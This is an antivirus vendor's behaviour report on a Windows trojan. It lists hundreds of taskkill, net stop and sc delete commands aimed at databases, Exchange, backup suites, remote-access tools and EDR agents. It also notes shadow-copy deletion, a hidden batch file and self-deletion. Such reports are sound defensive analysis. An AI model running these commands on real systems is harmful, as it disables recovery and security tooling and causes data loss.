Trojan.MulDrop18.41199

Added to the Dr.Web virus database: 2021-09-12

Virus description added:

Technical Information

Malicious functions
To complicate detection of its presence in the operating system, deletes volume shadow copies.
Executes the following
  • '<SYSTEM32>\net.exe' stop U8WorkerService1
  • '<SYSTEM32>\taskkill.exe' /IM RavTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM node.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ssms.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SecureCRT.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM pvlsvr.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM wampmanager.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM bedbg.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM nginx.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM rdm.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM beserver.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM RsTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM wrapper.exe /F
  • '<SYSTEM32>\net.exe' stop UTUService
  • '<SYSTEM32>\net.exe' stop UFReportService
  • '<SYSTEM32>\taskkill.exe' /IM sqlbrowser.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM yundetectservice.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GNAupdaemon.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sshd.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SyncBaseSvr.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlwriter.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM VirtualBoxVM.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ssclient.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM msftesql.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM iempwatchdog.exe /F
  • '<SYSTEM32>\net.exe' stop UFAllNet
  • '<SYSTEM32>\taskkill.exe' /IM VBoxSVC.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlmangr.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM vm-tray.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM baidunetdisk.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM VirtualBox.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM beremote.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mssearch.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SecureCRTPortable.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM vmtoolsd.exe /F
  • '<SYSTEM32>\net.exe' stop U8WebPool
  • '<SYSTEM32>\taskkill.exe' /IM eSightService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM CasLicenceServer.exe /F
  • '<SYSTEM32>\net.exe' stop U8DispatchService
  • '<SYSTEM32>\net.exe' stop NFSysService
  • '<SYSTEM32>\taskkill.exe' /IM BackupExecManagementService.exe /F
  • '<SYSTEM32>\net.exe' stop TurboCRM70
  • '<SYSTEM32>\taskkill.exe' /IM CCenter.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM fdlauncher.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM vm-agent-daemon.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM fdhost.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TeamViewer.exe /F
  • '<SYSTEM32>\net.exe' stop SentinelKeysServer
  • '<SYSTEM32>\net.exe' stop "ABBYY.Licensing.FineReader.Professional.12.0"
  • '<SYSTEM32>\net.exe' stop AgentX
  • '<SYSTEM32>\net.exe' stop "Apple Mobile Device Service"
  • '<SYSTEM32>\net.exe' stop DGPNPSEV
  • '<SYSTEM32>\net.exe' stop U8KeyManagePool
  • '<SYSTEM32>\net.exe' stop U8TaskService
  • '<SYSTEM32>\net.exe' stop U8EISService
  • '<SYSTEM32>\net.exe' stop U8SLReportService
  • '<SYSTEM32>\taskkill.exe' /IM tv_x64.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM benetns.exe /F
  • '<SYSTEM32>\net.exe' stop U8SCMPool
  • '<SYSTEM32>\net.exe' stop U8MPool
  • '<SYSTEM32>\taskkill.exe' /IM d_manage.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM softmgrlite.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM cygrunsrv.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM reportingservicesservice.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM tv_w32.exe /F
  • '<SYSTEM32>\net.exe' stop U8GCService
  • '<SYSTEM32>\taskkill.exe' /IM bengine.exe /F
  • '<SYSTEM32>\net.exe' stop U8EncryptService
  • '<SYSTEM32>\taskkill.exe' /IM ScanFrm.exe /F
  • '<SYSTEM32>\net.exe' stop NFOTPService
  • '<SYSTEM32>\taskkill.exe' /IM abs_deployer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM php.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM oracle.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Tencentdll.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DisklessServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM JhTask.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM IDDAService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Jointsky.CloudExchange.NodeService.ein /F
  • '<SYSTEM32>\taskkill.exe' /IM TXPlatform.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM IcafeServicesTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ControlServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM AutoDealService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Jointsky.CloudExchangeService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM BsAgent_0.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM His6Service.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM fppdis5.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM WeChat.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM dinotify.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DataShareBox.ShareBoxService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM perl.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TransMain.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM service_agent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM AndroidServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DAService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM QQ.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TsServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM PersonUDisk.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Executer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM EnergyDataService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM emagent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM jenkins.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM NetDiskServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM AllPassCBHost.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM MPService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DumpServer.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ap_nginx.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM UIODetect.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM oravssw.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SOUNDMAN.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ipc_proxy.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GoodGameSrv.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM igfxHK.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SyncBaseConsole.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM "phpStudy.exe" /F
  • '<SYSTEM32>\taskkill.exe' /IM aspnet_state.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sfupdatemgr.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM igfxEM.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TNSLSNR.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM "notepad++.exe" /F
  • '<SYSTEM32>\taskkill.exe' /IM edr_monitor.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM RemoteAssistProcess.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM RAVCp164.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM BarMoniService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM igfxTray.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM OPCClient.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM BarCMService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM DataShareBox.ShareBoxMonitorService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GNCEFExternal.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM BarServerView.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM PrivacyIconClient.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM MySQLNotifier.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SunloginClient.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sfavsvc.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM GoodGame.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM redis-server.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM edr_agent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM SupportAssistAgent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM edr_sec_plan.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TsService.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM 360bdoctor.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM AutoBackUpEx.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM navicat.exe /F
  • '<SYSTEM32>\net.exe' stop Mysoft.SchedulingService
  • '<SYSTEM32>\taskkill.exe' /IM AppMain.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mdm.exe /F
  • '<SYSTEM32>\net.exe' stop GNWebService
  • '<SYSTEM32>\net.exe' stop AdobeARMservice
  • '<SYSTEM32>\net.exe' stop MSExchangeFrontEndTransport
  • '<SYSTEM32>\net.exe' stop CASWebServer
  • '<SYSTEM32>\net.exe' stop FirebirdServerDefaultInstance
  • '<SYSTEM32>\net.exe' stop MSExchangeFastSearch
  • '<SYSTEM32>\net.exe' stop CASLicenceServer
  • '<SYSTEM32>\net.exe' stop AutoUpdateService
  • '<SYSTEM32>\net.exe' stop RapidRecoveryAgent
  • '<SYSTEM32>\net.exe' stop QPCore
  • '<SYSTEM32>\net.exe' stop Service2
  • '<SYSTEM32>\net.exe' stop MSExchangeDiagnostics
  • '<SYSTEM32>\net.exe' stop TeamViewer
  • '<SYSTEM32>\net.exe' stop JWService
  • '<SYSTEM32>\net.exe' stop MSExchangeDelivery
  • '<SYSTEM32>\net.exe' stop MSExchangeEdgeSync
  • '<SYSTEM32>\net.exe' stop MSExchangeImap4
  • '<SYSTEM32>\net.exe' stop RapService
  • '<SYSTEM32>\net.exe' stop "Alibaba Security Aegis Detect Service"
  • '<SYSTEM32>\net.exe' stop TPlusStdUpgradeService1300
  • '<SYSTEM32>\net.exe' stop MSExchangeIS
  • '<SYSTEM32>\net.exe' stop AGSService
  • '<SYSTEM32>\net.exe' stop TPlusStdTaskService1300
  • '<SYSTEM32>\net.exe' stop MSExchangeIMAP4BE
  • '<SYSTEM32>\net.exe' stop CASXMLService
  • '<SYSTEM32>\net.exe' stop Tomcat8
  • '<SYSTEM32>\net.exe' stop TPlusStdAppService1300
  • '<SYSTEM32>\net.exe' stop "AliyunService"
  • '<SYSTEM32>\net.exe' stop VeeamTransportSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeHMRecovery
  • '<SYSTEM32>\net.exe' stop "Alibaba Security Aegis Update Service"
  • '<SYSTEM32>\net.exe' stop VeeanBackupSvc
  • '<SYSTEM32>\net.exe' stop MSSQL$SQL2008
  • '<SYSTEM32>\net.exe' stop MSExchangeHM
  • '<SYSTEM32>\net.exe' stop VeeamCatalogSvc
  • '<SYSTEM32>\net.exe' stop JWRinfoClientService
  • '<SYSTEM32>\net.exe' stop VMAuthdService
  • '<SYSTEM32>\net.exe' stop VMUSBArbService
  • '<SYSTEM32>\net.exe' stop Realtek11nSU
  • '<SYSTEM32>\net.exe' stop "memcached Server"
  • '<SYSTEM32>\net.exe' stop TeamViewer8
  • '<SYSTEM32>\net.exe' stop "igfxCUIService2.0.0.0"
  • '<SYSTEM32>\net.exe' stop U8WorkerService2
  • '<SYSTEM32>\net.exe' stop Apache2.4
  • '<SYSTEM32>\net.exe' stop VMwareHostd
  • '<SYSTEM32>\net.exe' stop UIODetect
  • '<SYSTEM32>\taskkill.exe' /IM pg_ctl.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ThunderPlatform.exe /F
  • '<SYSTEM32>\net.exe' stop HaoZipSvc
  • '<SYSTEM32>\taskkill.exe' /IM BackupExec.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM VBoxSDS.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlservr.exe /F
  • '<SYSTEM32>\net.exe' stop "Synology Drive VSS Service x64"
  • '<SYSTEM32>\net.exe' stop "VMware NAT Service"
  • '<SYSTEM32>\net.exe' stop UFIDAWebService
  • '<SYSTEM32>\net.exe' stop JWEM3DBAUTORun
  • '<SYSTEM32>\net.exe' stop MSExchangeCompliance
  • '<SYSTEM32>\net.exe' stop VMnetDHCP
  • '<SYSTEM32>\net.exe' stop FirebirdGuardianDeafaultInstance
  • '<SYSTEM32>\net.exe' stop MSExchangeAntispamUpdate
  • '<SYSTEM32>\net.exe' stop mysqltransport
  • '<SYSTEM32>\net.exe' stop MSExchangeDagMgmt
  • '<SYSTEM32>\net.exe' stop DellDRLogSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeADTopology
  • '<SYSTEM32>\net.exe' stop WebAttendServer
  • '<SYSTEM32>\net.exe' stop Apache2.2
  • '<SYSTEM32>\net.exe' stop MSComplianceAudit
  • '<SYSTEM32>\net.exe' stop wanxiao-monitor
  • '<SYSTEM32>\net.exe' stop XenSvc
  • '<SYSTEM32>\net.exe' stop xenlite
  • '<SYSTEM32>\net.exe' stop MSExchangeMailboxAssistants
  • '<SYSTEM32>\net.exe' stop TPlusStdWebService1300
  • '<SYSTEM32>\net.exe' stop DDNSService
  • '<SYSTEM32>\taskkill.exe' /IM iexplore.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mysqld.exe /F
  • '<SYSTEM32>\net.exe' stop K3MMainSuspendService
  • '<SYSTEM32>\net.exe' stop IngressMgr
  • '<SYSTEM32>\net.exe' stop SupportAssistAgent
  • '<SYSTEM32>\net.exe' stop DFServ
  • '<SYSTEM32>\net.exe' stop MSExchangeUMCR
  • '<SYSTEM32>\net.exe' stop "Dell Hardware Support"
  • '<SYSTEM32>\net.exe' stop OMAILREPORT
  • '<SYSTEM32>\net.exe' stop "NetVault Process Manager"
  • '<SYSTEM32>\net.exe' stop AutoUpdatePatchService
  • '<SYSTEM32>\net.exe' stop NFLicenceServer
  • '<SYSTEM32>\net.exe' stop MySQL5_OA
  • '<SYSTEM32>\net.exe' stop ImtsEventSvr
  • '<SYSTEM32>\net.exe' stop RavService
  • '<SYSTEM32>\net.exe' stop d_safe
  • '<SYSTEM32>\taskkill.exe' /IM rcrelay.exe /F
  • '<SYSTEM32>\net.exe' stop RTCAVMCU
  • '<SYSTEM32>\taskkill.exe' /IM SogouImeBroker.exe /F
  • '<SYSTEM32>\net.exe' stop U8SendMailAdmin
  • '<SYSTEM32>\net.exe' stop CobianBackup10
  • '<SYSTEM32>\taskkill.exe' /IM vm-agent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM TeamViewer_Service.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM java.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Att.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM httpd.exe /F
  • '<SYSTEM32>\net.exe' stop KugouService
  • '<SYSTEM32>\net.exe' stop NFVPrintServer
  • '<SYSTEM32>\net.exe' stop ceng_web_svc_d
  • '<SYSTEM32>\net.exe' stop K3ClouManager
  • '<SYSTEM32>\net.exe' stop KpService
  • '<SYSTEM32>\net.exe' stop EvtSys
  • '<SYSTEM32>\net.exe' stop pcas
  • '<SYSTEM32>\net.exe' stop DDVRulesProcessor
  • '<SYSTEM32>\net.exe' stop AngelOfDeath
  • '<SYSTEM32>\net.exe' stop MSExchangeUM
  • '<SYSTEM32>\net.exe' stop MSExchangeRepl
  • '<SYSTEM32>\net.exe' stop "OracleOraDb10g_homeliSQL*Plus"
  • '<SYSTEM32>\net.exe' stop VeeamMountSvc
  • '<SYSTEM32>\net.exe' stop MSExchangePOP3BE
  • '<SYSTEM32>\net.exe' stop CASMsgSrv
  • '<SYSTEM32>\net.exe' stop OracleDBConsoleilas
  • '<SYSTEM32>\net.exe' stop VeeamCloudSvc
  • '<SYSTEM32>\net.exe' stop CASVirtualDiskService
  • '<SYSTEM32>\net.exe' stop VeeamDeploySvc
  • '<SYSTEM32>\net.exe' stop MSExchangeNotificationsBroker
  • '<SYSTEM32>\net.exe' stop iNethinkSQLBackupSvc
  • '<SYSTEM32>\net.exe' stop VeeamNFSSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeMailboxReplication
  • '<SYSTEM32>\net.exe' stop MSExchangePop3
  • '<SYSTEM32>\net.exe' stop MSExchangeRPC
  • '<SYSTEM32>\net.exe' stop VeeamBrokerSvc
  • '<SYSTEM32>\net.exe' stop VeeamDistributionSvc
  • '<SYSTEM32>\net.exe' stop "FileZilla Server"
  • '<SYSTEM32>\net.exe' stop 360EntPGSvc
  • '<SYSTEM32>\net.exe' stop RavTask
  • '<SYSTEM32>\net.exe' stop MSExchangeTransportLogSearch
  • '<SYSTEM32>\net.exe' stop K3MobileServiceManage
  • '<SYSTEM32>\net.exe' stop ClickToRunSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeTransport
  • '<SYSTEM32>\net.exe' stop TPlusStdUpgradeService1220
  • '<SYSTEM32>\net.exe' stop MSExchangeThrottling
  • '<SYSTEM32>\net.exe' stop MySQL
  • '<SYSTEM32>\net.exe' stop TPlusStdTaskService1220
  • '<SYSTEM32>\net.exe' stop ServiceMid
  • '<SYSTEM32>\net.exe' stop MSExchangeSubmission
  • '<SYSTEM32>\net.exe' stop TPlusStdAppService1220
  • '<SYSTEM32>\net.exe' stop tmlisten
  • '<SYSTEM32>\net.exe' stop MSExchangeServiceHost
  • '<SYSTEM32>\net.exe' stop "Bonjour Service"
  • '<SYSTEM32>\taskkill.exe' /IM HaoZip.exe /F
Modifies file system
Creates the following files
  • %TEMP%\4346.tmp\4347.tmp\4348.bat
Deletes the following files
  • %TEMP%\4346.tmp\4347.tmp\4348.bat
Deletes itself.
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
Creates and executes the following
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\4346.tmp\4347.tmp\4348.bat <Full path to file>" (with hidden window)
Executes the following
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\4346.tmp\4347.tmp\4348.bat <Full path to file>"
  • '<SYSTEM32>\sc.exe' delete GPSUserSvr
  • '<SYSTEM32>\sc.exe' delete SQLANYs_sem5
  • '<SYSTEM32>\net1.exe' stop CASXMLService
  • '<SYSTEM32>\net1.exe' stop TPlusStdAppService1300
  • '<SYSTEM32>\sc.exe' delete msftesql
  • '<SYSTEM32>\sc.exe' delete GPSDaemon
  • '<SYSTEM32>\sc.exe' delete CobianBackup10
  • '<SYSTEM32>\net1.exe' stop MSExchangeImap4
  • '<SYSTEM32>\net1.exe' stop "AliyunService"
  • '<SYSTEM32>\net1.exe' stop VeeamTransportSvc
  • '<SYSTEM32>\sc.exe' delete MSSEARCH
  • '<SYSTEM32>\sc.exe' delete OracleRemExecService
  • '<SYSTEM32>\sc.exe' delete RaAutoInstSrv_RT2870
  • '<SYSTEM32>\net1.exe' stop MSExchangeHMRecovery
  • '<SYSTEM32>\sc.exe' delete "SyncBASE Service"
  • '<SYSTEM32>\sc.exe' delete wampapache
  • '<SYSTEM32>\sc.exe' delete MediatekRegistryWriter
  • '<SYSTEM32>\net1.exe' stop "Alibaba Security Aegis Update Service"
  • '<SYSTEM32>\net1.exe' stop VeeanBackupSvc
  • '<SYSTEM32>\sc.exe' delete "OSP Service"
  • '<SYSTEM32>\sc.exe' delete NFWebServer
  • '<SYSTEM32>\sc.exe' delete vmware-converter-worker
  • '<SYSTEM32>\sc.exe' delete LPManager
  • '<SYSTEM32>\net1.exe' stop MSSQL$SQL2008
  • '<SYSTEM32>\sc.exe' delete "FontCache3.0.0.0"
  • '<SYSTEM32>\sc.exe' delete 360EntClientSvc
  • '<SYSTEM32>\sc.exe' delete vmware-converter-server
  • '<SYSTEM32>\sc.exe' delete BestSyncSvc
  • '<SYSTEM32>\net1.exe' stop "Alibaba Security Aegis Detect Service"
  • '<SYSTEM32>\net1.exe' stop VeeamCatalogSvc
  • '<SYSTEM32>\sc.exe' delete QQCertificateService
  • '<SYSTEM32>\net1.exe' stop TPlusStdWebService1300
  • '<SYSTEM32>\net1.exe' stop MSExchangePop3
  • '<SYSTEM32>\sc.exe' delete GPSDownSvr
  • '<SYSTEM32>\sc.exe' delete GPSMysqld
  • '<SYSTEM32>\sc.exe' delete Mysoft.Config.WindowsService
  • '<SYSTEM32>\net1.exe' stop CASVirtualDiskService
  • '<SYSTEM32>\net1.exe' stop VeeamDeploySvc
  • '<SYSTEM32>\sc.exe' delete GPSTomcat6
  • '<SYSTEM32>\sc.exe' delete Mysoft.Autoupgrade.UpdateService
  • '<SYSTEM32>\net1.exe' stop MSExchangeNotificationsBroker
  • '<SYSTEM32>\sc.exe' delete GPSLoginSvr
  • '<SYSTEM32>\sc.exe' delete Mysoft.Autoupgrade.DispatchService
  • '<SYSTEM32>\net1.exe' stop iNethinkSQLBackupSvc
  • '<SYSTEM32>\net1.exe' stop VeeamNFSSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeMailboxReplication
  • '<SYSTEM32>\sc.exe' delete GPSMediaSvr
  • '<SYSTEM32>\sc.exe' delete ErpEnvSvc
  • '<SYSTEM32>\sc.exe' delete LMS
  • '<SYSTEM32>\net1.exe' stop DDNSService
  • '<SYSTEM32>\sc.exe' delete GPSGatewaySvr
  • '<SYSTEM32>\sc.exe' delete TbossSystem
  • '<SYSTEM32>\net1.exe' stop MSExchangeMailboxAssistants
  • '<SYSTEM32>\sc.exe' delete OracleMTSRecoveryService
  • '<SYSTEM32>\sc.exe' delete GPSDataProcSvr
  • '<SYSTEM32>\sc.exe' delete semwebsrv
  • '<SYSTEM32>\net1.exe' stop RapService
  • '<SYSTEM32>\net1.exe' stop TPlusStdUpgradeService1300
  • '<SYSTEM32>\sc.exe' delete GPSStorageSvr
  • '<SYSTEM32>\sc.exe' delete SQLService
  • '<SYSTEM32>\net1.exe' stop MSExchangeIS
  • '<SYSTEM32>\net1.exe' stop AGSService
  • '<SYSTEM32>\net1.exe' stop TPlusStdTaskService1300
  • '<SYSTEM32>\sc.exe' delete OracleDBConcoleorcl
  • '<SYSTEM32>\net1.exe' stop MSExchangeIMAP4BE
  • '<SYSTEM32>\sc.exe' delete CASLicenceServer
  • '<SYSTEM32>\sc.exe' delete 360EntSvc
  • '<SYSTEM32>\net1.exe' stop Service2
  • '<SYSTEM32>\net1.exe' stop MSExchangeDiagnostics
  • '<SYSTEM32>\sc.exe' delete MsDtsServer100
  • '<SYSTEM32>\sc.exe' delete AppFabricCachingService
  • '<SYSTEM32>\net1.exe' stop TeamViewer
  • '<SYSTEM32>\net1.exe' stop JWService
  • '<SYSTEM32>\sc.exe' delete TPlusStdAppService1300
  • '<SYSTEM32>\sc.exe' delete Jenkins
  • '<SYSTEM32>\sc.exe' delete IpOverUsbSvc
  • '<SYSTEM32>\sc.exe' delete c2wts
  • '<SYSTEM32>\net1.exe' stop MSExchangeDelivery
  • '<SYSTEM32>\sc.exe' delete SSSyncService
  • '<SYSTEM32>\sc.exe' delete apachezt
  • '<SYSTEM32>\sc.exe' delete OracleJobSchedulerORCL
  • '<SYSTEM32>\sc.exe' delete ProjectCalcService16
  • '<SYSTEM32>\sc.exe' delete secbizsrv
  • '<SYSTEM32>\net1.exe' stop Tomcat8
  • '<SYSTEM32>\sc.exe' delete SSMonitorService
  • '<SYSTEM32>\sc.exe' delete eSightService
  • '<SYSTEM32>\net1.exe' stop MSExchangeDagMgmt
  • '<SYSTEM32>\sc.exe' delete MMRHookService
  • '<SYSTEM32>\sc.exe' delete OSearch16
  • '<SYSTEM32>\sc.exe' delete "Sense Shield Service"
  • '<SYSTEM32>\net1.exe' stop "VMware NAT Service"
  • '<SYSTEM32>\net1.exe' stop JWEM3DBAUTORun
  • '<SYSTEM32>\sc.exe' delete OpenSSHd
  • '<SYSTEM32>\sc.exe' delete kbasesrv
  • '<SYSTEM32>\sc.exe' delete SPTraceV4
  • '<SYSTEM32>\sc.exe' delete "UWS HiPriv Services"
  • '<SYSTEM32>\sc.exe' delete "AHS SERVICE"
  • '<SYSTEM32>\net1.exe' stop MSExchangeCompliance
  • '<SYSTEM32>\net1.exe' stop JWRinfoClientService
  • '<SYSTEM32>\sc.exe' delete smtpsvrJT
  • '<SYSTEM32>\sc.exe' delete vmware-converter-agent
  • '<SYSTEM32>\net1.exe' stop QPCore
  • '<SYSTEM32>\sc.exe' delete "FlexNet Licensing Service 64"
  • '<SYSTEM32>\net1.exe' stop AutoUpdateService
  • '<SYSTEM32>\net1.exe' stop AdobeARMservice
  • '<SYSTEM32>\sc.exe' delete jhi_service
  • '<SYSTEM32>\sc.exe' delete 360EntHttpServer
  • '<SYSTEM32>\sc.exe' delete 2345PicSvc
  • '<SYSTEM32>\sc.exe' delete VisualSVNServer
  • '<SYSTEM32>\net1.exe' stop MSExchangeFrontEndTransport
  • '<SYSTEM32>\sc.exe' delete VirboxWebServer
  • '<SYSTEM32>\sc.exe' delete zyb_sync
  • '<SYSTEM32>\sc.exe' delete Protect_2345Explorer
  • '<SYSTEM32>\sc.exe' delete vsvnjobsvc
  • '<SYSTEM32>\net1.exe' stop CASWebServer
  • '<SYSTEM32>\net1.exe' stop FirebirdServerDefaultInstance
  • '<SYSTEM32>\net1.exe' stop MSExchangeHM
  • '<SYSTEM32>\sc.exe' delete TPlusStdUpgradeService1300
  • '<SYSTEM32>\net1.exe' stop MSExchangeFastSearch
  • '<SYSTEM32>\sc.exe' delete btPanel
  • '<SYSTEM32>\sc.exe' delete MotionBoardRCService57
  • '<SYSTEM32>\net1.exe' stop CASLicenceServer
  • '<SYSTEM32>\net1.exe' stop RapidRecoveryAgent
  • '<SYSTEM32>\sc.exe' delete TPlusStdTaskService1300
  • '<SYSTEM32>\sc.exe' delete MSMQ
  • '<SYSTEM32>\sc.exe' delete KMSELDI
  • '<SYSTEM32>\sc.exe' delete MotionBoard57
  • '<SYSTEM32>\net1.exe' stop MSExchangeEdgeSync
  • '<SYSTEM32>\sc.exe' delete SQLAgent$SQL2008
  • '<SYSTEM32>\sc.exe' delete SQLTELEMETRY
  • '<SYSTEM32>\sc.exe' delete KuaiYunTools
  • '<SYSTEM32>\sc.exe' delete ADWS
  • '<SYSTEM32>\sc.exe' delete MSSQL$SQL2008
  • '<SYSTEM32>\sc.exe' delete RemoteAssistService
  • '<SYSTEM32>\net1.exe' stop UFReportService
  • '<SYSTEM32>\sc.exe' delete Mysoft.DataCenterService
  • '<SYSTEM32>\net1.exe' stop NFVPrintServer
  • '<SYSTEM32>\sc.exe' delete NscAuthService
  • '<SYSTEM32>\sc.exe' delete U8TaskService
  • '<SYSTEM32>\net1.exe' stop ceng_web_svc_d
  • '<SYSTEM32>\net1.exe' stop K3ClouManager
  • '<SYSTEM32>\sc.exe' delete MASTER
  • '<SYSTEM32>\sc.exe' delete U8SLReportService
  • '<SYSTEM32>\sc.exe' delete FTA
  • '<SYSTEM32>\sc.exe' delete U8SCMPool
  • '<SYSTEM32>\net1.exe' stop KpService
  • '<SYSTEM32>\net1.exe' stop EvtSys
  • '<SYSTEM32>\sc.exe' delete RTCASMCU
  • '<SYSTEM32>\sc.exe' delete "U8MPool"
  • '<SYSTEM32>\net1.exe' stop K3MMainSuspendService
  • '<SYSTEM32>\net1.exe' stop KugouService
  • '<SYSTEM32>\net1.exe' stop IngressMgr
  • '<SYSTEM32>\sc.exe' delete U8KeyManagePool
  • '<SYSTEM32>\sc.exe' delete OfficeUpdateService
  • '<SYSTEM32>\sc.exe' delete U8GCService
  • '<SYSTEM32>\net1.exe' stop SupportAssistAgent
  • '<SYSTEM32>\net1.exe' stop DFServ
  • '<SYSTEM32>\sc.exe' delete asComSvc
  • '<SYSTEM32>\sc.exe' delete U8EncryptService
  • '<SYSTEM32>\net1.exe' stop "Dell Hardware Support"
  • '<SYSTEM32>\net1.exe' stop RavService
  • '<SYSTEM32>\sc.exe' delete "Daemon Service"
  • '<SYSTEM32>\sc.exe' delete U8EISService
  • '<SYSTEM32>\sc.exe' delete "Nuo Update Monitor"
  • '<SYSTEM32>\sc.exe' delete U8DispatchService
  • '<SYSTEM32>\net1.exe' stop OMAILREPORT
  • '<SYSTEM32>\sc.exe' delete RtcSrv
  • '<SYSTEM32>\net1.exe' stop SentinelKeysServer
  • '<SYSTEM32>\net1.exe' stop CASMsgSrv
  • '<SYSTEM32>\sc.exe' delete UFAllNet
